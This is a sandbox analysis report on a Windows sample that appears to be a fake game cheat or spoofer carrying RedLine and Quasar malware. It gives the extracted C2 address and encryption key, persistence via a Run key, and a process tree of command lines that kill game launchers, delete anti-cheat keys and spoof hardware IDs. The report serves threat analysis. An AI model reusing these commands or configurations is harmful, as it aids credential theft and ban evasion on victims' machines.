Resubmissions
31/03/2025, 16:47  250331-vak21atwcy  (score 10)
31/03/2025, 16:04  250331-thy36as1es  (score 10)
31/03/2022, 10:22  220331-md8cpsada5  (score 10)
Analysis
max time kernel: 12s
max time network: 66s
platform: windows10-ltsc_2021_x64
resource: win10ltsc2021-20250314-en
resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250314-en, locale:en-us, os:windows10-ltsc_2021-x64, system
submitted: 31/03/2025, 16:04
Static task
static1
Behavioral tasks (sample: 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe; resource per task)
behavioral1: win10ltsc2021-20250314-en
behavioral2: win10v2004-20250314-en
behavioral3: win10ltsc2021-20250314-en
behavioral4: win11-20250313-en
behavioral5: android-x64-arm64-20240910-en
behavioral6: android-33-x64-arm64-20240910-en
behavioral7: macos-20241106-en
behavioral8: ubuntu1804-amd64-20240611-en
behavioral9: debian9-armhf-20240611-en
behavioral10: debian9-mipsbe-20240418-en
behavioral11: debian9-mipsel-20240226-en
General
Target: 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Size: 3.6MB
MD5: cf56adaf1236aa52a98723c8aa61ff84
SHA1: 00a517dfa5a9294f5619a7a1d8d0181966692768
SHA256: 3b6f8fe87241a3af1ff1414c5223a20b97f2bb2b7b7a9cb574077e253fb6db88
SHA512: 2ef67cad31b4792fe066c2cd2f8a745493cf6bd1cab055e689ffa02bb8ec656746f28d06ae0dd6a4a88043c35ac7cf5cc18c3165e81959ef6b6d87ca12a9742b
SSDEEP: 98304:k5a7Zy+b1yCgWYdhz/tH3ILijJxeWB/5izLurIBQPZJCj:kKA+QWQhLF3ILqJx0zLuL2
Malware Config
Extracted: redline
cheat
C2: 85.215.222.129:43240
Extracted: quasar
Version: 2.8.0.1
Images.exe
C2: 85.215.222.129:65535
G8fgKgmsR7tqiTolCN
encryption_key: SLsfHXfM5GTIubFvF50I
install_name: Images.exe
log_directory: FiveM_Logs
reconnect_delay: 3000
startup_key: Venom Client Startup
Signatures
Quasar family
Quasar payload 2 IoCs
Resource | YARA rule
behavioral1/files/0x00080000000281e5-17.dat | family_quasar
behavioral1/memory/4424-47-0x0000000000080000-0x000000000016C000-memory.dmp | family_quasar
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 2 IoCs
Resource | YARA rule
behavioral1/files/0x00080000000281e6-39.dat | family_redline
behavioral1/memory/5944-48-0x0000000000FD0000-0x0000000000FEE000-memory.dmp | family_redline
Redline family
SectopRAT payload 2 IoCs
Resource | YARA rule
behavioral1/files/0x00080000000281e6-39.dat | family_sectoprat
behavioral1/memory/5944-48-0x0000000000FD0000-0x0000000000FEE000-memory.dmp | family_sectoprat
Sectoprat family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Description | IoC | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | Hsjdosj.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Description | IoC | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Hsjdosj.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Hsjdosj.exe
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Description | IoC | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation | 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation | Gptmvmjkvvg.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation | Images.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation | WScript.exe
Executes dropped EXE 9 IoCs
PID | Process
4372 | Hsjdosj.exe
4424 | Gptmvmjkvvg.exe
5944 | Oajujxo.exe
3784 | Images.exe
3244 | Gptmvmjkvvg.exe
4580 | Images.exe
3336 | Images.exe
6104 | Images.exe
2236 | Images.exe
Resource | YARA rule
behavioral1/files/0x0008000000025e04-7.dat | themida
behavioral1/memory/4372-24-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp | themida
behavioral1/memory/4372-50-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp | themida
behavioral1/memory/4372-49-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp | themida
behavioral1/memory/4372-57-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp | themida
behavioral1/memory/4372-101-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp | themida
Adds Run key to start application 2 TTPs 2 IoCs
Description | IoC | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Venom Client Startup = "C:\\Windows\\SysWOW64\\Images.exe" | WScript.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Venom Client Startup = "C:\\Windows\\SysWOW64\\Images.exe" | WScript.exe
Checks whether UAC is enabled 1 TTPs 1 IoCs
Description | IoC | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Hsjdosj.exe
PID | Process
3208 | powershell.exe
4396 | powershell.exe
5468 | powershell.exe
1172 | powershell.exe
5668 | powershell.exe
3052 | powershell.exe
4928 | powershell.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
Flow | IoC
24 | raw.githubusercontent.com
25 | raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Flow | IoC
20 | ip-api.com
Drops file in System32 directory 4 IoCs
Description | IoC | Process
File created | C:\Windows\SysWOW64\Images.exe | Gptmvmjkvvg.exe
File opened for modification | C:\Windows\SysWOW64\Images.exe | Gptmvmjkvvg.exe
File opened for modification | C:\Windows\SysWOW64\Images.exe | Images.exe
File opened for modification | C:\Windows\SysWOW64\Images.exe | WScript.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
PID | Process
4372 | Hsjdosj.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Description | IoC
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Processes (18 events, in order): WScript.exe, powershell.exe, Images.exe, Images.exe, Images.exe, WScript.exe, Oajujxo.exe, schtasks.exe, powershell.exe, Images.exe, Gptmvmjkvvg.exe, cmd.exe, chcp.com, schtasks.exe, Images.exe, PING.EXE, Gptmvmjkvvg.exe, explorer.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
PID | Process
4584 | cmd.exe
824 | cmd.exe
4756 | PING.EXE
Enumerates system info in registry 2 TTPs 6 IoCs
Description | IoC | Process
Key created | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier | reg.exe
Set value (str) | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "Apple-23059-16299-295987873" | reg.exe
Key created | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | reg.exe
Set value (str) | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "Apple-23055555011734" | reg.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
PID | Process
1088 | ipconfig.exe
5624 | ipconfig.exe
Kills process with taskkill 11 IoCs
PID | Process
1056 | taskkill.exe
2556 | taskkill.exe
2416 | taskkill.exe
5284 | taskkill.exe
416 | taskkill.exe
1044 | taskkill.exe
5776 | taskkill.exe
1508 | taskkill.exe
4948 | taskkill.exe
2712 | taskkill.exe
3456 | taskkill.exe
Modifies registry class 5 IoCs
Description | IoC | Process
Set value (data) | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Interface\ClsidStore = 0230655028325592323231078962429702342331316296021782623189 | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Local Settings | Images.exe
Key created | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Local Settings | explorer.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | WScript.exe
Key created | \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Interface | reg.exe
Modifies registry key 1 TTPs 64 IoCs
Runs ping.exe 1 TTPs 1 IoCs
PID | Process
4756 | PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
PID | Process
4832 | schtasks.exe
5224 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 52 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
PID | Process
3784 | Images.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes (tree depth in brackets; matched signatures listed under each process)
[1] C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe (PID 4124)
  Command line: C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe bcdedit /c set shutdown /r readonly /f force /t 2
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe (PID 4372)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe (PID 5468)
      Command line: C:\Windows\system32\cmd.exe /c Color 0b
    [3] C:\Windows\system32\cmd.exe (PID 476)
      Command line: C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    [3] C:\Windows\system32\cmd.exe (PID 1172)
      Command line: C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    [3] C:\Windows\system32\cmd.exe (PID 3632)
      Command line: C:\Windows\system32\cmd.exe /c cls
    [3] C:\Windows\system32\cmd.exe (PID 4920)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\taskkill.exe (PID 4948)
        Command line: taskkill /f /im EpicGamesLauncher.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 4824)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im steam.exe
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\taskkill.exe (PID 2712)
        Command line: taskkill /f /im steam.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 824)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
      - System Network Configuration Discovery: Internet Connection Discovery
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\taskkill.exe (PID 3456)
        Command line: taskkill /f /im FortniteClient-Win64-Shipping.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 5112)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\taskkill.exe (PID 1044)
        Command line: taskkill /f /im OneDrive.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 5036)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\taskkill.exe (PID 1056)
        Command line: taskkill /f /im EpicGamesLauncher.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 3828)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\taskkill.exe (PID 2556)
        Command line: taskkill /f /im EpicGamesLauncher.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 3932)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\taskkill.exe (PID 2416)
        Command line: taskkill /f /im EpicGamesLauncher.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 5432)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
      [4] C:\Windows\system32\taskkill.exe (PID 5776)
        Command line: taskkill /f /im EpicGamesLauncher.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 2740)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    [3] C:\Windows\system32\cmd.exe (PID 2500)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    [3] C:\Windows\system32\cmd.exe (PID 5956)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
      [4] C:\Windows\system32\taskkill.exe (PID 5284)
        Command line: taskkill /f /im EpicGamesLauncher.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 3388)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
      [4] C:\Windows\system32\taskkill.exe (PID 416)
        Command line: taskkill /f /im EpicGamesLauncher.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 1088)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    [3] C:\Windows\system32\cmd.exe (PID 956)
      Command line: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
      [4] C:\Windows\system32\taskkill.exe (PID 1508)
        Command line: taskkill /f /im EpicGamesLauncher.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 1668)
      Command line: C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      [4] C:\Windows\system32\reg.exe (PID 1260)
        Command line: reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    [3] C:\Windows\system32\cmd.exe (PID 4004)
      Command line: C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      [4] C:\Windows\system32\reg.exe (PID 3740)
        Command line: reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 1380)
      Command line: C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      [4] C:\Windows\system32\reg.exe (PID 2280)
        Command line: reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 4464)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
      [4] C:\Windows\system32\reg.exe (PID 228)
        Command line: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-23052 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 2392)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
      [4] C:\Windows\system32\reg.exe (PID 2104)
        Command line: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-23055 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 3088)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
      [4] C:\Windows\system32\reg.exe (PID 4744)
        Command line: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple23055-5550-11734-16578 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 4716)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-%random%-%random} /f
      [4] C:\Windows\system32\reg.exe (PID 4824)
        Command line: REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-23055-%random} /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 4812)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
      [4] C:\Windows\system32\reg.exe (PID 3344)
        Command line: REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-23055555011734 /f
    [3] C:\Windows\system32\cmd.exe (PID 1044)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-%random% /f
      [4] C:\Windows\system32\reg.exe (PID 4008)
        Command line: REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-23055 /f
    [3] C:\Windows\system32\cmd.exe (PID 4136)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-%random% /f
      [4] C:\Windows\system32\reg.exe (PID 2632)
        Command line: REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-23055 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 2976)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
      [4] C:\Windows\system32\reg.exe (PID 2792)
        Command line: REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-23055555011734 /f
        - Enumerates system info in registry
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 5256)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
      [4] C:\Windows\system32\reg.exe (PID 3068)
        Command line: REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-23055-5550-1173416578} /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 2436)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
      [4] C:\Windows\system32\reg.exe (PID 384)
        Command line: REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-23055-5550-1173416578} /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 5040)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
      [4] C:\Windows\system32\reg.exe (PID 3596)
        Command line: REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-23055-5550-1173416578} /f
    [3] C:\Windows\system32\cmd.exe (PID 2168)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    [3] C:\Windows\system32\cmd.exe (PID 2060)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
      [4] C:\Windows\system32\reg.exe (PID 4664)
        Command line: REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-23055-5550-1173416578 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 3828)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
      [4] C:\Windows\system32\reg.exe (PID 4756)
        Command line: REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-23059-16299-295987873 /f
    [3] C:\Windows\system32\cmd.exe (PID 2272)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
      [4] C:\Windows\system32\reg.exe (PID 1800)
        Command line: REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-23059-16299-295987873 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 4988)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
      [4] C:\Windows\system32\reg.exe (PID 3372)
        Command line: REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-23059-16299-295987873 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 4604)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    [3] C:\Windows\system32\cmd.exe (PID 2204)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
      [4] C:\Windows\system32\reg.exe (PID 2572)
        Command line: REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-23059-16299-295987873 /f
        - Enumerates system info in registry
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 5768)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
      [4] C:\Windows\system32\reg.exe (PID 3696)
        Command line: REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-23059-16299-295987873} /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 3364)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
      [4] C:\Windows\system32\reg.exe (PID 5432)
        Command line: REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-23059-16299-295987873} /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 3432)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
      [4] C:\Windows\system32\reg.exe (PID 5360)
        Command line: REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-23059 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 3524)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
      [4] C:\Windows\system32\reg.exe (PID 5420)
        Command line: REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 23059 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 4724)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
      [4] C:\Windows\system32\reg.exe (PID 6120)
        Command line: REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 23059 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 1564)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
      [4] C:\Windows\system32\reg.exe (PID 2500)
        Command line: REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-23059 /f
        - Modifies registry key
    [3] C:\Windows\system32\cmd.exe (PID 3800)
      Command line: C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f >nul 2>&1
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple23059-16299-29598-787310449} /f4⤵
- Modifies registry key
PID:1560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f3⤵PID:5292
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple23059-16299-29598-787310449} /f4⤵
- Modifies registry key
PID:3440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f3⤵PID:5980
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
PID:4432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f3⤵PID:5956
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 23059 /f4⤵PID:1972
-
-
-
